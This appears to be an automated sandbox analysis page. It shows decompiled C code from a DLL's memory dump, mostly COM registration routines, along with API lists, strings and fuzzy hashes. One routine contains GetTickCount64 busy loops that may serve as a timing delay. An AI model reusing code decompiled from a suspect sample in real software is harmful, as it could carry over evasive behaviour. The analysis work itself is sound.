Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 56cd0df00007468fc7d447a5c5de4331d26b480d987d244af85a07e48727a436
Instruction ID: aba73a1163829c1b7b1eca376e25c7821b4e651c74565704b6807c04ae3556b8
Opcode Fuzzy Hash: 56cd0df00007468fc7d447a5c5de4331d26b480d987d244af85a07e48727a436
Instruction Fuzzy Hash: 0F61BE72A44209EFDB50CFE8C941BDEBBF8EF95720F104969E954EB290D7309942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E33D0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E6E7E33D0(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v0;
				WCHAR* _v8;
				WCHAR* _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v40;
				char _v44;
				char _v72;
				intOrPtr _v76;
				short _v540;
				char _v1586;
				char _v1588;
				char _v2628;
				WCHAR* _v2632;
				WCHAR* _v2636;
				WCHAR* _v2640;
				WCHAR* _v2644;
				WCHAR* _v2648;
				char _v2652;
				signed int _v2668;
				char _v2692;
				signed int _v2696;
				void* __ebp;
				signed int _t79;
				signed int _t80;
				signed int _t83;
				long _t88;
				signed int _t91;
				signed int _t92;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				intOrPtr _t120;
				intOrPtr _t121;
				signed int _t124;
				char* _t130;
				signed int _t131;
				signed int _t134;
				struct HINSTANCE__* _t146;
				intOrPtr _t151;
				void* _t153;
				char _t154;
				intOrPtr* _t161;
				signed int _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t168;
				intOrPtr _t173;
				signed int _t175;
				intOrPtr _t176;
				intOrPtr _t188;
				void* _t191;
				void* _t192;
				signed int _t194;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				intOrPtr* _t202;
				signed int _t207;
				signed int* _t208;
				signed int* _t209;
				intOrPtr* _t210;
				signed int* _t211;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;
				signed int _t220;
				void* _t221;
				void* _t231;

				_t231 = __fp0;
				_t153 = __ebx;
				_push(0xffffffff);
				_push(E6E809310);
				_push( *[fs:0x0]);
				_t219 = _t218 - 0xa4c;
				_t79 =  *0x6e81e008; // 0x77dcee0d
				_t80 = _t79 ^ _t216;
				_v20 = _t80;
				_push(__esi);
				_push(__edi);
				_push(_t80);
				 *[fs:0x0] =  &_v16;
				_t194 = __edx;
				_t202 = _a8;
				_t154 = 0x6e8184a4;
				_v2636 = 0;
				_v2652 = 0x6e8184a4;
				_v2648 = 0;
				_v2644 = 0;
				_v2640 = 0;
				if(_t202 != 0) {
					_t151 =  *_t202;
					if(_t151 != 0) {
						do {
							_t188 =  *((intOrPtr*)(_t202 + 4));
							if(_t151 != 0 && _t188 != 0) {
								E6E7DDCD0(_t153,  &_v2648, _t194, _t202, _t151, _t188);
							}
							_t151 =  *((intOrPtr*)(_t202 + 8));
							_t202 = _t202 + 8;
						} while (_t151 != 0);
						_t154 = _v2652;
					}
				}
				_v8 = 0;
				_t83 =  *((intOrPtr*)(_t154 + 0xc))( &_v2652, L"APPID", 0x6e818528);
				_t203 = _t83;
				_v8 = 0xffffffff;
				if(_t83 < 0) {
					L11:
					E6E7DE0B0( &_v2652, _t194);
					goto L12;
				} else {
					_t205 =  *0x6e81fccc; // 0x6e7d0000
					_v2632 = 0;
					_t88 = GetModuleFileNameW(_t205,  &_v540, 0x104);
					if(_t88 != 0) {
						__eflags = _t88 - 0x104;
						if(_t88 != 0x104) {
							E6E7DD8D0( &_v2628,  &_v540);
							_t220 = _t219 + 4;
							__eflags = _t205;
							if(_t205 == 0) {
								L18:
								_t205 = 0x22;
								_t161 =  &_v2628;
								_v1588 = 0x22;
								_t191 = _t161 + 2;
								do {
									_t91 =  *_t161;
									_t161 = _t161 + 2;
									__eflags = _t91;
								} while (_t91 != 0);
								_t164 = 2 + (_t161 - _t191 >> 1) * 2;
								__eflags = _t164;
								if(_t164 == 0) {
									L23:
									_t165 =  &_v1588;
									_t192 = _t165 + 2;
									do {
										_t92 =  *_t165;
										_t165 = _t165 + 2;
										__eflags = _t92;
									} while (_t92 != 0);
									_t167 = _t165 - _t192 >> 1;
									 *(_t216 + _t167 * 2 - 0x630) = _t205;
									_t168 = 2 + _t167 * 2;
									__eflags = _t168 - 0x418;
									if(_t168 >= 0x418) {
										E6E7E4A1A();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t216);
										_t217 = _t220;
										_push(0xffffffff);
										_push(E6E809530);
										_push( *[fs:0x0]);
										_t221 = _t220 - 0x38;
										_t95 =  *0x6e81e008; // 0x77dcee0d
										_t96 = _t95 ^ _t217;
										_v2696 = _t96;
										_push(_t205);
										_push(_t194);
										_push(_t96);
										 *[fs:0x0] =  &_v2692;
										_t98 = _v2668;
										__eflags = _t98 - 1;
										if(_t98 != 1) {
											__eflags = _t98;
											if(_t98 == 0) {
												_v12 = 1;
												_t207 =  *0x6e8204b4; // 0x6e81ead0
												__eflags = _t207;
												if(_t207 != 0) {
													__eflags =  *_t207 - _t98;
													if( *_t207 != _t98) {
														do {
															_t71 = _t207 + 0x10; // 0x0
															_t175 =  *_t71;
															__eflags = _t175;
															if(_t175 != 0) {
																 *((intOrPtr*)( *_t175 + 8))(_t175);
															}
															_t73 = _t207 + 0x20; // 0x6e7dfda0
															 *(_t207 + 0x10) = 0;
															 *((intOrPtr*)( *_t73))(0);
															_t207 = _t207 + 0x24;
															__eflags =  *_t207;
														} while ( *_t207 != 0);
													}
												}
												_t208 =  *0x6e81ea78; // 0x6e81c614
												_t173 =  *0x6e81ea7c; // 0x6e81c618
												__eflags = _t208 - _t173;
												while(_t208 < _t173) {
													_t102 =  *_t208;
													__eflags = _t102;
													if(_t102 != 0) {
														 *((intOrPtr*)( *((intOrPtr*)(_t102 + 0x1c))))(0);
														_t173 =  *0x6e81ea7c; // 0x6e81c618
													}
													_t208 =  &(_t208[1]);
													__eflags = _t208 - _t173;
												}
												E6E7E31E0(_t153, 0x6e820488, _t194, _t208);
											}
										} else {
											 *0x6e820480 = _v0;
											_v12 = 0;
											asm("movups xmm0, [0x6e818538]");
											asm("movups [0x6e820500], xmm0");
											__eflags = 0x6e81ead0 - 0xffffffff;
											if(0x6e81ead0 != 0xffffffff) {
												__eflags =  *0x6e81ead0;
												 *0x6e8204b4 = 0x6e81ead0;
												if( *0x6e81ead0 != 0) {
													_t211 = 0x6e81ead0;
													do {
														_t59 =  &(_t211[8]); // 0x6e7dfda0
														 *( *_t59)(1);
														__eflags = _t211[9];
														_t61 =  &(_t211[9]); // 0x0
														_t211 = _t61;
													} while (__eflags != 0);
												}
											}
											_t209 =  *0x6e81ea78; // 0x6e81c614
											_t176 =  *0x6e81ea7c; // 0x6e81c618
											__eflags = _t209 - _t176;
											while(_t209 < _t176) {
												_t124 =  *_t209;
												__eflags = _t124;
												if(_t124 != 0) {
													_t62 = _t124 + 0x1c; // 0x6e7e0750
													 *((intOrPtr*)( *_t62))(1);
													_t176 =  *0x6e81ea7c; // 0x6e81c618
												}
												_t209 =  &(_t209[1]);
												__eflags = _t209 - _t176;
											}
											_v12 = 0xffffffff;
											_t210 = __imp__GetTickCount64;
											 *_t210();
											 *_t210();
											_t197 = 1;
											do {
												 *_t210();
												asm("movsd xmm1, [0x6e818688]");
												_t197 = _t197 + 1;
												__eflags = _t197;
												asm("movd xmm0, edi");
												asm("cvtdq2pd xmm0, xmm0");
												asm("comisd xmm1, xmm0");
											} while (_t197 >= 0);
											_t198 = 1;
											do {
												 *_t210();
												asm("movsd xmm1, [0x6e818680]");
												_t198 = _t198 + 1;
												__eflags = _t198;
												asm("movd xmm0, edi");
												asm("cvtdq2pd xmm0, xmm0");
												asm("comisd xmm1, xmm0");
											} while (_t198 >= 0);
											 *_t210();
											 *_t210();
											_t199 = 1;
											do {
												 *_t210();
												asm("movsd xmm1, [0x6e818688]");
												_t199 = _t199 + 1;
												__eflags = _t199;
												asm("movd xmm0, edi");
												asm("cvtdq2pd xmm0, xmm0");
												asm("comisd xmm1, xmm0");
											} while (_t199 >= 0);
											_t200 = 1;
											do {
												 *_t210();
												asm("movsd xmm1, [0x6e818680]");
												_t200 = _t200 + 1;
												__eflags = _t200;
												asm("movd xmm0, edi");
												asm("cvtdq2pd xmm0, xmm0");
												asm("comisd xmm1, xmm0");
											} while (__eflags >= 0);
											E6E7D21B0(_t153, _t200, __eflags); // executed
											_t120 = E6E7D5580(_t176, __eflags); // executed
											_v76 = _t120;
											_t121 =  *0x6e820480; // 0x6e7d0000
											_v72 = 1;
											asm("movups xmm0, [ebp-0x44]");
											_v40 = _t121;
											asm("movups [ecx], xmm0");
											_v44 = 0;
											asm("movups xmm0, [ebp-0x34]");
											asm("movups [ecx+0x10], xmm0");
											asm("movups xmm0, [ebp-0x24]");
											asm("movups [ecx+0x20], xmm0");
											 *((intOrPtr*)(_t221 - 0x34 + 0x30)) = _v28;
											E6E7D6430(_t153, _t221 - 0x34, _t192, _t200, _t210); // executed
										}
										 *[fs:0x0] = _v20;
										__eflags = _v24 ^ _t217;
										return E6E7E440A(_v24 ^ _t217);
									} else {
										__eflags = 0;
										 *((short*)(_t216 + _t168 - 0x630)) = 0;
										_t130 =  &_v1588;
										goto L27;
									}
								} else {
									__eflags = _t164 - 0x416;
									if(_t164 > 0x416) {
										 *(E6E7F5AF8()) = 0x22;
										E6E7EE5D6();
										E6E7DBA40( &_v2632);
										E6E7DE0B0( &_v2652, _t194);
										goto L12;
									} else {
										E6E7E8DB0( &_v1586,  &_v2628, _t164);
										_t220 = _t220 + 0xc;
										goto L23;
									}
								}
							} else {
								_t146 = GetModuleHandleW(0);
								__eflags = _t205 - _t146;
								if(_t205 == _t146) {
									goto L18;
								} else {
									_t130 =  &_v2628;
									L27:
									_t131 = E6E7DDCD0(_t153,  &_v2648, _t194, _t205, L"Module", _t130);
									asm("sbb esi, esi");
									_t203 = ( ~_t131 & 0x7ff8fff2) + 0x8007000e;
									__eflags = _t203;
									if(_t203 < 0) {
										L37:
										E6E7DBA40( &_v2632);
										goto L11;
									} else {
										_t134 = E6E7DDCD0(_t153,  &_v2648, _t194, _t203, L"Module_Raw",  &_v2628);
										__eflags = _t134;
										_t203 =  !=  ? 0 : 0x8007000e;
										if(_t134 == 0) {
											goto L37;
										} else {
											__eflags = _a4;
											if(_a4 == 0) {
												__eflags = _t194;
												if(_t194 == 0) {
													goto L36;
												} else {
													_push(0);
													goto L35;
												}
											} else {
												__eflags = _t194;
												if(_t194 == 0) {
													L36:
													_t203 = 0x80070057;
													goto L37;
												} else {
													_push(1);
													L35:
													_push(L"REGISTRY");
													_t203 = E6E7DE200(_t153,  &_v2652, _t194, _t203, _t231,  &_v540, _t194);
													E6E7DBA40( &_v2632);
													goto L11;
												}
											}
										}
									}
								}
							}
						} else {
							E6E7DBA40( &_v2632);
							E6E7DE0B0( &_v2652, _t194);
							L12:
							 *[fs:0x0] = _v16;
							return E6E7E440A(_v20 ^ _t216);
						}
					} else {
						_t203 = E6E7DD8A0(_t153);
						goto L11;
					}
				}
			}

0x6e7e33d0
0x6e7e33d0
0x6e7e33d3
0x6e7e33d5
0x6e7e33e0
0x6e7e33e1
0x6e7e33e7
0x6e7e33ec
0x6e7e33ee
0x6e7e33f1
0x6e7e33f2
0x6e7e33f3
0x6e7e33f7
0x6e7e33fd
0x6e7e33ff
0x6e7e3402
0x6e7e3407
0x6e7e3411
0x6e7e3417
0x6e7e3421
0x6e7e342b
0x6e7e3437
0x6e7e3439
0x6e7e343d
0x6e7e3440
0x6e7e3440
0x6e7e3445
0x6e7e3453
0x6e7e3453
0x6e7e3458
0x6e7e345b
0x6e7e345e
0x6e7e3462
0x6e7e3462
0x6e7e343d
0x6e7e3478
0x6e7e3480
0x6e7e3483
0x6e7e3485
0x6e7e348e
0x6e7e34be
0x6e7e34c4
0x00000000
0x6e7e3490
0x6e7e3490
0x6e7e34a3
0x6e7e34ad
0x6e7e34b5
0x6e7e34e8
0x6e7e34ed
0x6e7e3519
0x6e7e351e
0x6e7e3521
0x6e7e3523
0x6e7e353c
0x6e7e353c
0x6e7e3541
0x6e7e3547
0x6e7e354e
0x6e7e3551
0x6e7e3551
0x6e7e3554
0x6e7e3557
0x6e7e3557
0x6e7e3560
0x6e7e3567
0x6e7e3569
0x6e7e358e
0x6e7e358e
0x6e7e3594
0x6e7e3597
0x6e7e3597
0x6e7e359a
0x6e7e359d
0x6e7e359d
0x6e7e35a4
0x6e7e35a6
0x6e7e35ae
0x6e7e35b5
0x6e7e35bb
0x6e7e36a5
0x6e7e36aa
0x6e7e36ab
0x6e7e36ac
0x6e7e36ad
0x6e7e36ae
0x6e7e36af
0x6e7e36b0
0x6e7e36b1
0x6e7e36b3
0x6e7e36b5
0x6e7e36c0
0x6e7e36c1
0x6e7e36c4
0x6e7e36c9
0x6e7e36cb
0x6e7e36ce
0x6e7e36cf
0x6e7e36d0
0x6e7e36d4
0x6e7e36da
0x6e7e36dd
0x6e7e36e0
0x6e7e382f
0x6e7e3831
0x6e7e3833
0x6e7e383a
0x6e7e3840
0x6e7e3842
0x6e7e3844
0x6e7e3846
0x6e7e3848
0x6e7e3848
0x6e7e3848
0x6e7e384b
0x6e7e384d
0x6e7e3852
0x6e7e3852
0x6e7e3855
0x6e7e385a
0x6e7e3861
0x6e7e3863
0x6e7e3866
0x6e7e3866
0x6e7e3848
0x6e7e3846
0x6e7e386b
0x6e7e3871
0x6e7e3877
0x6e7e3879
0x6e7e3880
0x6e7e3882
0x6e7e3884
0x6e7e388b
0x6e7e388d
0x6e7e388d
0x6e7e3893
0x6e7e3896
0x6e7e3896
0x6e7e389f
0x6e7e389f
0x6e7e36e6
0x6e7e36e9
0x6e7e36ee
0x6e7e36fa
0x6e7e3701
0x6e7e3708
0x6e7e370b
0x6e7e370d
0x6e7e3714
0x6e7e3719
0x6e7e371b
0x6e7e3720
0x6e7e3720
0x6e7e3725
0x6e7e3727
0x6e7e372b
0x6e7e372b
0x6e7e372b
0x6e7e3720
0x6e7e3719
0x6e7e3730
0x6e7e3736
0x6e7e373c
0x6e7e373e
0x6e7e3740
0x6e7e3742
0x6e7e3744
0x6e7e3746
0x6e7e374b
0x6e7e374d
0x6e7e374d
0x6e7e3753
0x6e7e3756
0x6e7e3756
0x6e7e375a
0x6e7e3761
0x6e7e3767
0x6e7e3769
0x6e7e376b
0x6e7e3770
0x6e7e3770
0x6e7e3772
0x6e7e377a
0x6e7e377a
0x6e7e377b
0x6e7e377f
0x6e7e3783
0x6e7e3783
0x6e7e3789
0x6e7e3790
0x6e7e3790
0x6e7e3792
0x6e7e379a
0x6e7e379a
0x6e7e379b
0x6e7e379f
0x6e7e37a3
0x6e7e37a3
0x6e7e37a9
0x6e7e37ab
0x6e7e37ad
0x6e7e37b2
0x6e7e37b2
0x6e7e37b4
0x6e7e37bc
0x6e7e37bc
0x6e7e37bd
0x6e7e37c1
0x6e7e37c5
0x6e7e37c5
0x6e7e37cb
0x6e7e37d0
0x6e7e37d0
0x6e7e37d2
0x6e7e37da
0x6e7e37da
0x6e7e37db
0x6e7e37df
0x6e7e37e3
0x6e7e37e3
0x6e7e37e9
0x6e7e37ee
0x6e7e37f3
0x6e7e37f9
0x6e7e3800
0x6e7e3804
0x6e7e3808
0x6e7e380e
0x6e7e3811
0x6e7e3815
0x6e7e3819
0x6e7e381d
0x6e7e3821
0x6e7e3825
0x6e7e3828
0x6e7e3828
0x6e7e38ac
0x6e7e38b9
0x6e7e38c3
0x6e7e35c1
0x6e7e35c1
0x6e7e35c3
0x6e7e35cb
0x00000000
0x6e7e35cb
0x6e7e356b
0x6e7e356b
0x6e7e3571
0x6e7e3633
0x6e7e3635
0x6e7e3640
0x6e7e364b
0x00000000
0x6e7e3577
0x6e7e3586
0x6e7e358b
0x00000000
0x6e7e358b
0x6e7e3571
0x6e7e3525
0x6e7e3527
0x6e7e352d
0x6e7e352f
0x00000000
0x6e7e3531
0x6e7e3531
0x6e7e35d1
0x6e7e35dd
0x6e7e35e6
0x6e7e35ee
0x6e7e35f4
0x6e7e35f6
0x6e7e3695
0x6e7e369b
0x00000000
0x6e7e35fc
0x6e7e360e
0x6e7e361a
0x6e7e361c
0x6e7e361f
0x00000000
0x6e7e3621
0x6e7e3621
0x6e7e3624
0x6e7e365a
0x6e7e365c
0x00000000
0x6e7e365e
0x6e7e365e
0x00000000
0x6e7e365e
0x6e7e3626
0x6e7e3626
0x6e7e3628
0x6e7e3690
0x6e7e3690
0x00000000
0x6e7e362a
0x6e7e362a
0x6e7e3660
0x6e7e3660
0x6e7e367e
0x6e7e3680
0x00000000
0x6e7e3680
0x6e7e3628
0x6e7e3624
0x6e7e361f
0x6e7e35f6
0x6e7e352f
0x6e7e34ef
0x6e7e34f5
0x6e7e3500
0x6e7e34cb
0x6e7e34ce
0x6e7e34e5
0x6e7e34e5
0x6e7e34b7
0x6e7e34bc
0x00000000
0x6e7e34bc
0x6e7e34b5

APIs

GetModuleFileNameW.KERNEL32(6E7D0000,?,00000104), ref: 6E7E34AD
GetModuleHandleW.KERNEL32(00000000), ref: 6E7E3527

Strings

Module_Raw, xrefs: 6E7E3603
APPID, xrefs: 6E7E346D
Module, xrefs: 6E7E35D2
REGISTRY, xrefs: 6E7E3660

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 71cd583975bbac783dbfc94d112b8ba664d043a343ea598c65e8a63601b73b49
Instruction ID: 57bbb0efc33855bd38201323e3e7b830b2d127242a58c3c31eabc81b6743c8fa
Opcode Fuzzy Hash: 71cd583975bbac783dbfc94d112b8ba664d043a343ea598c65e8a63601b73b49
Instruction Fuzzy Hash: 3771D635900619ABDB24CFA4CE58BEA7378AF45704F0005EDD91AA7BB0EB745E48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DF9E0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 193
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6E7DF9E0(void* __ebx, signed short __edx, void* __edi, void* __esi, void* __fp0, WCHAR** _a4, intOrPtr* _a8) {
				intOrPtr* _v0;
				WCHAR* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				short _v540;
				char _v1586;
				char _v1588;
				char _v2628;
				WCHAR* _v2632;
				WCHAR* _v2636;
				WCHAR* _v2640;
				WCHAR* _v2644;
				WCHAR* _v2648;
				char _v2652;
				intOrPtr _v2684;
				signed int _t80;
				signed int _t81;
				void* _t84;
				long _t89;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t95;
				void* _t97;
				intOrPtr* _t98;
				char* _t111;
				signed int _t112;
				void* _t115;
				signed int _t116;
				intOrPtr _t132;
				void* _t134;
				intOrPtr* _t135;
				char _t139;
				intOrPtr* _t146;
				void* _t149;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				WCHAR** _t154;
				char* _t162;
				intOrPtr _t167;
				void* _t170;
				void* _t171;
				signed short _t173;
				intOrPtr* _t176;
				intOrPtr* _t179;
				intOrPtr* _t183;
				WCHAR* _t186;
				WCHAR* _t189;
				signed int _t195;
				void* _t197;
				void* _t198;
				void* _t199;
				void* _t208;

				_t208 = __fp0;
				_t134 = __ebx;
				_push(0xffffffff);
				_push(E6E809310);
				_push( *[fs:0x0]);
				_t198 = _t197 - 0xa4c;
				_t80 =  *0x6e81e008; // 0x77dcee0d
				_t81 = _t80 ^ _t195;
				_v20 = _t81;
				_push(__esi);
				_push(__edi);
				_push(_t81);
				 *[fs:0x0] =  &_v16;
				_t173 = __edx;
				_t179 = _a8;
				_t139 = 0x6e8184a4;
				_v2636 = 0;
				_v2652 = 0x6e8184a4;
				_v2648 = 0;
				_v2644 = 0;
				_v2640 = 0;
				if(_t179 != 0) {
					_t132 =  *_t179;
					if(_t132 != 0) {
						do {
							_t167 =  *((intOrPtr*)(_t179 + 4));
							if(_t132 != 0 && _t167 != 0) {
								E6E7DDCD0(_t134,  &_v2648, _t173, _t179, _t132, _t167);
							}
							_t132 =  *((intOrPtr*)(_t179 + 8));
							_t179 = _t179 + 8;
						} while (_t132 != 0);
						_t139 = _v2652;
					}
				}
				_v8 = 0;
				_t84 =  *((intOrPtr*)(_t139 + 0xc))( &_v2652, L"APPID", 0x6e818528);
				_t180 = _t84;
				_v8 = 0xffffffff;
				if(_t84 < 0) {
					L11:
					E6E7DE0B0( &_v2652, _t173);
					goto L12;
				} else {
					_t182 =  *0x6e81fccc; // 0x6e7d0000
					_v2632 = 0;
					_t89 = GetModuleFileNameW(_t182,  &_v540, 0x104);
					if(_t89 != 0) {
						if(_t89 != 0x104) {
							E6E7DD8D0( &_v2628,  &_v540);
							_t199 = _t198 + 4;
							if(_t182 == 0 || _t182 == GetModuleHandleW(0)) {
								_t182 = 0x22;
								_t146 =  &_v2628;
								_v1588 = 0x22;
								_t170 = _t146 + 2;
								do {
									_t92 =  *_t146;
									_t146 = _t146 + 2;
								} while (_t92 != 0);
								_t149 = 2 + (_t146 - _t170 >> 1) * 2;
								if(_t149 == 0) {
									L23:
									_t150 =  &_v1588;
									_t171 = _t150 + 2;
									do {
										_t93 =  *_t150;
										_t150 = _t150 + 2;
									} while (_t93 != 0);
									_t152 = _t150 - _t171 >> 1;
									 *(_t195 + _t152 * 2 - 0x630) = _t182;
									_t153 = 2 + _t152 * 2;
									if(_t153 >= 0x418) {
										E6E7E4A1A();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t195);
										_push(_t153);
										_t95 = _t153;
										_v2684 = _t95;
										if(_t95 == 0 || _t171 == 0) {
											return 0x80070057;
										} else {
											_t154 = _a4;
											if(_t154 != 0) {
												_push(_t134);
												_t135 = _v0;
												_push(_t182);
												if( *_t135 != 0 ||  *((intOrPtr*)(_t135 + 4)) != 0 ||  *((intOrPtr*)(_t135 + 8)) != 0xc0 ||  *((intOrPtr*)(_t135 + 0xc)) != 0x46000000) {
													_t183 = _t171 + 8;
													_push(_t173);
													if( *((intOrPtr*)(_t171 + 8)) == 0) {
														L57:
														_t97 = 0x80004002;
														goto L58;
													} else {
														do {
															_t176 =  *((intOrPtr*)(_t183 - 8));
															if(_t176 == 0 ||  *_t176 ==  *_t135 &&  *((intOrPtr*)(_t176 + 4)) ==  *((intOrPtr*)(_t135 + 4)) &&  *((intOrPtr*)(_t176 + 8)) ==  *((intOrPtr*)(_t135 + 8)) &&  *((intOrPtr*)(_t176 + 0xc)) ==  *((intOrPtr*)(_t135 + 0xc))) {
																_t98 =  *_t183;
																if(_t98 == 1) {
																	_t186 =  *((intOrPtr*)(_t183 - 4)) + _v12;
																	 *((intOrPtr*)( *_t186 + 4))(_t186);
																	 *_a4 = _t186;
																	goto L60;
																} else {
																	_t97 =  *_t98(_v12, _t135, _t154,  *((intOrPtr*)(_t183 - 4)));
																	if(_t97 == 0) {
																		L60:
																		return 0;
																	} else {
																		if(_t176 == 0 || _t97 >= 0) {
																			_t154 = _a4;
																			goto L56;
																		} else {
																			L58:
																			 *_a4 = 0;
																			return _t97;
																		}
																	}
																}
															} else {
																goto L56;
															}
															goto L62;
															L56:
															_t183 = _t183 + 0xc;
														} while ( *_t183 != 0);
														goto L57;
													}
												} else {
													_t189 =  *((intOrPtr*)(_t171 + 4)) + _t95;
													 *((intOrPtr*)( *_t189 + 4))(_t189);
													 *_a4 = _t189;
													return 0;
												}
											} else {
												return 0x80004003;
											}
										}
									} else {
										 *((short*)(_t195 + _t153 - 0x630)) = 0;
										_t111 =  &_v1588;
										goto L27;
									}
								} else {
									if(_t149 > 0x416) {
										 *(E6E7F5AF8()) = 0x22;
										E6E7EE5D6();
										E6E7DBA40( &_v2632);
										E6E7DE0B0( &_v2652, _t173);
										goto L12;
									} else {
										E6E7E8DB0( &_v1586,  &_v2628, _t149);
										_t199 = _t199 + 0xc;
										goto L23;
									}
								}
							} else {
								_t111 =  &_v2628;
								L27:
								_t112 = E6E7DDCD0(_t134,  &_v2648, _t173, _t182, L"Module", _t111);
								asm("sbb esi, esi");
								_t180 = ( ~_t112 & 0x7ff8fff2) + 0x8007000e;
								if(( ~_t112 & 0x7ff8fff2) + 0x8007000e >= 0) {
									_t115 = E6E7DDCD0(_t134,  &_v2648, _t173, _t180, L"Module_Raw",  &_v2628);
									_t180 =  !=  ? 0 : 0x8007000e;
									if(_t115 != 0) {
										_t162 =  &_v2652;
										_t116 = _t173 & 0x0000ffff;
										if(_a4 == 0) {
											_push(0);
										} else {
											_push(1);
										}
										_push(L"REGISTRY");
										_t180 = E6E7DE200(_t134, _t162, _t173, _t180, _t208,  &_v540, _t116);
									}
								}
								E6E7DBA40( &_v2632);
								goto L11;
							}
						} else {
							E6E7DBA40( &_v2632);
							E6E7DE0B0( &_v2652, _t173);
							L12:
							 *[fs:0x0] = _v16;
							return E6E7E440A(_v20 ^ _t195);
						}
					} else {
						_t180 = E6E7DD8A0(_t134);
						goto L11;
					}
				}
				L62:
			}

0x6e7df9e0
0x6e7df9e0
0x6e7df9e3
0x6e7df9e5
0x6e7df9f0
0x6e7df9f1
0x6e7df9f7
0x6e7df9fc
0x6e7df9fe
0x6e7dfa01
0x6e7dfa02
0x6e7dfa03
0x6e7dfa07
0x6e7dfa0d
0x6e7dfa0f
0x6e7dfa12
0x6e7dfa17
0x6e7dfa21
0x6e7dfa27
0x6e7dfa31
0x6e7dfa3b
0x6e7dfa47
0x6e7dfa49
0x6e7dfa4d
0x6e7dfa50
0x6e7dfa50
0x6e7dfa55
0x6e7dfa63
0x6e7dfa63
0x6e7dfa68
0x6e7dfa6b
0x6e7dfa6e
0x6e7dfa72
0x6e7dfa72
0x6e7dfa4d
0x6e7dfa88
0x6e7dfa90
0x6e7dfa93
0x6e7dfa95
0x6e7dfa9e
0x6e7dface
0x6e7dfad4
0x00000000
0x6e7dfaa0
0x6e7dfaa0
0x6e7dfab3
0x6e7dfabd
0x6e7dfac5
0x6e7dfafd
0x6e7dfb29
0x6e7dfb2e
0x6e7dfb33
0x6e7dfb4c
0x6e7dfb51
0x6e7dfb57
0x6e7dfb5e
0x6e7dfb61
0x6e7dfb61
0x6e7dfb64
0x6e7dfb67
0x6e7dfb70
0x6e7dfb79
0x6e7dfb9e
0x6e7dfb9e
0x6e7dfba4
0x6e7dfba7
0x6e7dfba7
0x6e7dfbaa
0x6e7dfbad
0x6e7dfbb4
0x6e7dfbb6
0x6e7dfbbe
0x6e7dfbcb
0x6e7dfc91
0x6e7dfc96
0x6e7dfc97
0x6e7dfc98
0x6e7dfc99
0x6e7dfc9a
0x6e7dfc9b
0x6e7dfc9c
0x6e7dfc9d
0x6e7dfc9e
0x6e7dfc9f
0x6e7dfca0
0x6e7dfca3
0x6e7dfca4
0x6e7dfca6
0x6e7dfcab
0x6e7dfd99
0x6e7dfcb9
0x6e7dfcb9
0x6e7dfcbe
0x6e7dfccb
0x6e7dfccc
0x6e7dfccf
0x6e7dfcd3
0x6e7dfd0b
0x6e7dfd0e
0x6e7dfd0f
0x6e7dfd5e
0x6e7dfd5e
0x00000000
0x6e7dfd11
0x6e7dfd11
0x6e7dfd11
0x6e7dfd16
0x6e7dfd36
0x6e7dfd3b
0x6e7dfd78
0x6e7dfd7e
0x6e7dfd84
0x00000000
0x6e7dfd3d
0x6e7dfd45
0x6e7dfd49
0x6e7dfd86
0x6e7dfd8e
0x6e7dfd4b
0x6e7dfd4d
0x6e7dfd53
0x00000000
0x6e7dfd63
0x6e7dfd63
0x6e7dfd69
0x6e7dfd72
0x6e7dfd72
0x6e7dfd4d
0x6e7dfd49
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7dfd56
0x6e7dfd56
0x6e7dfd59
0x00000000
0x6e7dfd11
0x6e7dfced
0x6e7dfcf0
0x6e7dfcf5
0x6e7dfcfd
0x6e7dfd04
0x6e7dfd04
0x6e7dfcc0
0x6e7dfcc8
0x6e7dfcc8
0x6e7dfcbe
0x6e7dfbd1
0x6e7dfbd3
0x6e7dfbdb
0x00000000
0x6e7dfbdb
0x6e7dfb7b
0x6e7dfb81
0x6e7dfc44
0x6e7dfc46
0x6e7dfc51
0x6e7dfc5c
0x00000000
0x6e7dfb87
0x6e7dfb96
0x6e7dfb9b
0x00000000
0x6e7dfb9b
0x6e7dfb81
0x6e7dfb41
0x6e7dfb41
0x6e7dfbe1
0x6e7dfbed
0x6e7dfbf6
0x6e7dfbfe
0x6e7dfc06
0x6e7dfc1a
0x6e7dfc28
0x6e7dfc2b
0x6e7dfc30
0x6e7dfc36
0x6e7dfc39
0x6e7dfc6b
0x6e7dfc3b
0x6e7dfc3b
0x6e7dfc3b
0x6e7dfc6d
0x6e7dfc7f
